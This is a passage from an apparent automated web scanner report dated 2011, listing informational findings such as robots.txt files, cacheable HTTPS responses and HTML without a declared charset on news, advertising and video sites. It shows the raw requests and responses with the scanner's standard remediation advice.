Path:   /fulltime/displayposition_thai.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nationejobs.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 04 Sep 2011 04:54:49 GMT
Connection: Keep-Alive
Content-Length: 113
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARRQRQT=OAPLLOKDNAPFONOLFIKBKAME; path=/
Cache-control: private

User-agent: *
Disallow: /~~~sales
Disallow: /parttime
Disallow: /fulltime/displayposition_thai.php?comid=31530

27.165. http://www.nationmultimedia.com/css/NT-styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /css/NT-styles.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nationmultimedia.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:05 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 03 Dec 2008 03:44:03 GMT
ETag: "1cf7442-2e-414ee6c0"
Accept-Ranges: bytes
Content-Length: 46
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google*
Disallow:

27.166. http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ndtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 31 May 2011 11:56:06 GMT
Content-Type: text/plain
Cache-Control: max-age=538
Expires: Sun, 04 Sep 2011 02:41:11 GMT
Date: Sun, 04 Sep 2011 02:32:13 GMT
Content-Length: 603
Connection: close

User-agent: *
Disallow: /mb/
Disallow: /convergence/ndtv/story.aspx
Disallow: /usopen09/*
Disallow: /ndtvfuture/*
Disallow: /ndtvfuture/ndtv/postcomments.aspx
Disallow: /convergence/ndtv/process
...[SNIP]...

27.167. http://www.npr.org/music/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.npr.org
Path:   /music/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.npr.org

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 21 Jul 2004 21:14:03 GMT
ETag: "ee-3dfc0e1ac1cc0"
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Thu, 05 May 2011 20:09:42 GMT
Keep-Alive: timeout=10, max=4993
Content-Type: text/plain
Connection: close
Date: Sun, 04 Sep 2011 04:44:08 GMT
Age: 148
Content-Length: 238

User-agent: *
Disallow: /cgi-bin
Disallow: /ramfiles/
Disallow: /*.smil
Disallow: /*.asx
Disallow: /*.ram
Disallow: /*.rmm
Disallow: /*.js
Disallow: /*.au
Disallow: /stations/force/force_localization.
...[SNIP]...

27.168. http://www.pulse360.com/behavior/nai-opt-out.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pulse360.com
Path:   /behavior/nai-opt-out.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pulse360.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:04:25 GMT
Server: Apache
Last-Modified: Fri, 02 Sep 2011 14:20:49 GMT
ETag: "120348-1a-11655240"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

27.169. http://www.realmedia.com/cgi-bin/nph-verify_oo.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realmedia.com
Path:   /cgi-bin/nph-verify_oo.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realmedia.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:04:34 GMT
Server: Apache
Last-Modified: Fri, 19 Oct 2007 19:44:57 GMT
ETag: "e73065-90-43cddc4fa0040"
Accept-Ranges: bytes
Content-Length: 144
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /EN-US/us/channels.html
Disallow: /EN-US/tech/oas/RichMedia/local/RMG/
Sitemap: http://www.247realmedia.com/sitemap.xml

27.170. http://www.simplymarry.com/timesmatri/faces/jsp/searchResult.photo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simplymarry.com
Path:   /timesmatri/faces/jsp/searchResult.photo

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.simplymarry.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:40:49 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_jk/1.2.31
Last-Modified: Wed, 05 Jan 2011 15:01:53 GMT
ETag: "103bf64-ddf-4991aaa58fa40"
Accept-Ranges: bytes
Content-Length: 3551
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /timesmatri/faces/jsp/profilePrivewPrint.jsp
Disallow: /timesmatri/faces/admin/
Disallow: /timesmatri/faces/jsp/reportGeneration.jsp
Allow: /

User-Agent: lycos
Disallow: /time
...[SNIP]...

27.171. http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smarterlifestyles.com
Path:   /2010/06/01/the-advantages-of-buying-penny-stocks/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smarterlifestyles.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=utf-8
Date: Sun, 04 Sep 2011 04:59:11 GMT
Server: lighttpd/1.4.21
X-Pingback: http://www.smarterlifestyles.com/xmlrpc.php
X-Powered-By: PHP/5.2.8
Connection: close

User-agent: *
Disallow:

27.172. http://www.taiwannews.com.tw/etn/news_content.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.taiwannews.com.tw
Path:   /etn/news_content.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.taiwannews.com.tw

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:44:21 GMT
Server: Apache
Last-Modified: Wed, 16 Dec 2009 07:22:42 GMT
ETag: "2f9ab3-390-47ad35f46b480"
Accept-Ranges: bytes
Content-Length: 912
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
#.w........
Disallow: /admin
Disallow: /images
Disallow: /lib
Disallow: /tmp

...[SNIP]...

27.173. http://www.ticketmaster.com/Sporting-Kansas-City-tickets/artist/805957  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /Sporting-Kansas-City-tickets/artist/805957

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ticketmaster.com

Response

HTTP/1.0 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-els1
Vary: Cookie
Last-Modified: Tue, 09 Aug 2011 19:57:34 GMT
ETag: "658-f9842780"
Accept-Ranges: bytes
Content-Length: 1624
Content-Type: text/plain
Date: Sun, 04 Sep 2011 04:44:29 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com

User-agent: *
Disallow: /seatingchart
Disallow: /change_area
Disallow: /find_area
Disallow: /error
Disallow: /cgi/outsider.plx
Disallow: /cgi/sfxoutsider.plx
Disallow: /cgi/tt.plx
Disallow: /healthche
...[SNIP]...

27.174. http://www.timesjobs.com/candidate/job-search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timesjobs.com
Path:   /candidate/job-search.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.timesjobs.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:36:10 GMT
Server: Apache
Last-Modified: Tue, 31 Mar 2009 04:16:25 GMT
ETag: "4cd-466627655b840"
Accept-Ranges: bytes
Content-Length: 1229
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /timesJobWebApp/
Allow: /

User-Agent: lycos
Disallow: /timesJobWebApp/
Allow: /

User-Agent: Fluffy
Disallow: /timesJobWebApp/
Allow: /

User-Agent: Teoma
Disallow: /timesJobW
...[SNIP]...

27.175. http://www.tribalfusion.com/optout/verify.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tribalfusion.com
Path:   /optout/verify.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tribalfusion.com

Response

HTTP/1.1 200 OK
Etag: "5e1f9c-636-473b81bbfbe6f"
Accept-Ranges: bytes
Content-Length: 1590
Date: Sun, 04 Sep 2011 10:59:00 GMT
Connection: close
Last-Modified: Wed, 16 Sep 2009 20:54:43 GMT
Server: Apache/2.2.13 (Unix) PHP/5.3.0
Content-Type: text/plain
Keep-Alive: timeout=5, max=100

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.176. http://www.watchindia.tv/AffiliateWiz/aw.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.watchindia.tv
Path:   /AffiliateWiz/aw.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.watchindia.tv

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Sun, 08 Aug 2010 11:51:19 GMT
Accept-Ranges: bytes
ETag: "638bbc3f036cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 04:45:22 GMT
Connection: close
Content-Length: 113431

User-agent: *
Disallow:/admin
Disallow:/watch_online_tv.aspx?program=4
Disallow:/watch_online_tv.aspx?program=6
Disallow:/watch_online_tv.aspx?program=24
Disallow:/watch_online_tv.aspx?program=27
...[SNIP]...

27.177. http://www.youtube-nocookie.com/v/IOje-N90P38&hl=en_US&fs=1&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube-nocookie.com
Path:   /v/IOje-N90P38&hl=en_US&fs=1&

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube-nocookie.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 11:00:11 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 18:22:34 GMT
ETag: "21b-4abe5541eae80"
Accept-Ranges: bytes
Content-Length: 539
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube
# Created in the distant future (the year 2000) after
# the robotic uprising of the mid 90's which wiped out all humans.

User-agent: Mediapartners-Google*
Disallow:

Use
...[SNIP]...

27.178. http://www.youtube.com/results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 04:45:38 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 18:22:34 GMT
ETag: "21b-4abe5541eae80"
Accept-Ranges: bytes
Content-Length: 539
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube
# Created in the distant future (the year 2000) after
# the robotic uprising of the mid 90's which wiped out all humans.

User-agent: Mediapartners-Google*
Disallow:

Use
...[SNIP]...

27.179. http://www.zigwheels.com/dealeroffer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zigwheels.com
Path:   /dealeroffer.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zigwheels.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:45:16 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.25 PHP/5.3.1
Last-Modified: Mon, 25 Jul 2011 06:03:11 GMT
ETag: "adda3b-b8-4a8de91e8c5c0"
Accept-Ranges: bytes
Content-Length: 184
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Allow: /images/
Allow: /media/
Disallow: /2db/
Disallow: /gateway/
Disallow: /inc/
Disallow: /js/
Disallow: /getonroadprice.php
Disallow: /getonroadpricecall.php

27.180. http://www2.glam.com/app/site/affiliate/nc/gs-optout.act  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.glam.com
Path:   /app/site/affiliate/nc/gs-optout.act

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www2.glam.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 22 Jun 2009 18:04:04 GMT
ETag: "47a80b4-1a-46cf3b3120d00"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 11:04:38 GMT
Connection: close

User-agent: *
Disallow: /

27.181. http://www2.panasonic.com/consumer-electronics/learn/Cameras-Camcorders/Digital-Cameras/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.panasonic.com
Path:   /consumer-electronics/learn/Cameras-Camcorders/Digital-Cameras/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www2.panasonic.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:40:37 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 11 Nov 2010 21:05:47 GMT
ETag: "20ac-16-567bc0c0"
Accept-Ranges: bytes
Content-Length: 22
Content-Type: text/plain

User-Agent: *
Allow: /

27.182. http://yads.zedo.com/ads2/c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yads.zedo.com
Path:   /ads2/c

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: yads.zedo.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:46:34 GMT
Server: ZEDO 3G
Last-Modified: Thu, 11 Sep 2008 04:29:02 GMT
ETag: "433bd37-4c-45697355a3f80"
Accept-Ranges: bytes
Content-Length: 76
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

28. Cacheable HTTPS response  previous  next
There are 2 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


28.1. https://maps-api-ssl.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:15:26 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

28.2. https://www.google.com/adsense/support/bin/request.py  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /adsense/support/bin/request.py

Request

GET /adsense/support/bin/request.py HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D799abfc4d86c130b%26v%3D2%26c%3De08e7d44%26s%3D4e6300ee%26t%3DR%3A0%3A%26sessref%3D; Expires=Sun, 04-Sep-2011 05:09:10 GMT; Path=/adsense/support; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 04:39:10 GMT
Expires: Sun, 04 Sep 2011 04:39:10 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en"
class="">
<head>
<pre style="font-size: 0;display: none;visibility: hidden;">


</pre>
<scrip
...[SNIP]...

29. HTML does not specify charset  previous  next
There are 88 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


29.1. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Request

GET /j.ad HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
X-Function: 409
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

29.2. http://ad-apac.doubleclick.net/adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-apac.doubleclick.net
Path:   /adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2

Request

GET /adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: ad-apac.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/banner/index_b5.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5496
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 04 Sep 2011 02:27:14 GMT
Expires: Sun, 04 Sep 2011 02:27:14 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

29.3. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.250  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.126265.CASALE/B5641720.250

Request

GET /adi/N6296.126265.CASALE/B5641720.250;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88918/;ord=458952158 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/88918/233260/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5815
Date: Sun, 04 Sep 2011 02:25:47 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

29.4. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.306  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.126265.CASALE/B5641720.306

Request

GET /adi/N6296.126265.CASALE/B5641720.306;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88958/;ord=589625147 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/88958/233224/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5996
Date: Sun, 04 Sep 2011 02:27:22 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

29.5. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Sun, 04 Sep 2011 04:06:28 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

29.6. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Request

GET /iframe3?bCIAAMFGJAAqmW0AAAAAAD8wHAAAAAAAAgAAAPgAAAAAAP8AAAAHFqpSJQAAAAAArFIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAntA8AAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACDu7eaMsarCnzNHL8Q300zrnFHZMFWEQrgcL4AAAAAAA==,,http%3A%2F%2Fd3.zedo.com%2Fjsc%2Fd3%2Fff2.html%3Fn%3D933%3Bc%3D56%3Bs%3D1%3Bd%3D15%3Bw%3D1%3Bh%3D1%3Bq%3D767,B%3D10%26Z%3D1x1%26_salt%3D3098932613%26r%3D0%26s%3D2377409,371b07e6-d69d-11e0-b373-78e7d1f5d918 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ads.bluelithium.com/st?ad_type=iframe&ad_size=1x1&section=2377409
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; bh="b!!!!y!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!$=3H3d!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#Q*T!!!!$=3H3d!#RY.!!!!$=3H3d!#SCj!!!!$=3H3d!#SCk!!!!$=3H3d!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!$=3H3d!#aG>!!!!$=3H3d!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!$=3H3d!#tK$!!!!$=3H3d!#ust!!!!$=3H3d!#usu!!!!$=3H3d!#v-#!!!!#=3*$x!#wW9!!!!$=3H3d!#yM#!!!!$=3H3d!$#WA!!!!$=3H3d!$%,!!!!!$=3H3d!$%SB!!!!$=3H3d!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*Q<!!!!$=3H3d!$*a0!!!!$=3H3d!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,0h!!!!$=3H3d!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!$=3H3d!$1:.!!!!#=3!ea!$2j$!!!!$=3H3d!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!$=3H3d!$3y-!!!!'=2v<]!$4ou!!!!$=3H3d!$5Nu!!!!$=3H3d!$5oO!!!!$=3H3d!$5qE!!!!$=3H3d!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!$=3H3d!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!$=3H3d!$=p8!!!!$=3H3d!$=s@!!!!#=3H3d!$>#M!!!!$=3H3d!$>#N!!!!$=3H3d"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:43:57 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0189.rm.sp2
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 02:43:57 GMT
Pragma: no-cache
Content-Length: 105
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body><!-- Delivery record decoding failed with reason = 4 (Query string expired) --></body></html>

29.7. http://ad4.liverail.com/util/companions.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad4.liverail.com
Path:   /util/companions.php

Request

GET /util/companions.php HTTP/1.1
Host: ad4.liverail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Sun, 04 Sep 2011 04:06:36 GMT
Server: lighttpd/1.4.28
Content-Length: 27

<html><body>
</body></html>

29.8. http://ads.indiatimes.com/ads.dll/genptypead  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.indiatimes.com
Path:   /ads.dll/genptypead

Request

GET /ads.dll/genptypead HTTP/1.1
Host: ads.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 04:08:16 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Set-Cookie: GeoDetail=254%2C915%2C58141; path=/; expires=Mon, 05 Sep 2011 09:38:16 GMT
Expires: Mon, 08 Dec 2008 04:08:16 GMT
Content-Type: text/html
Content-Length: 342

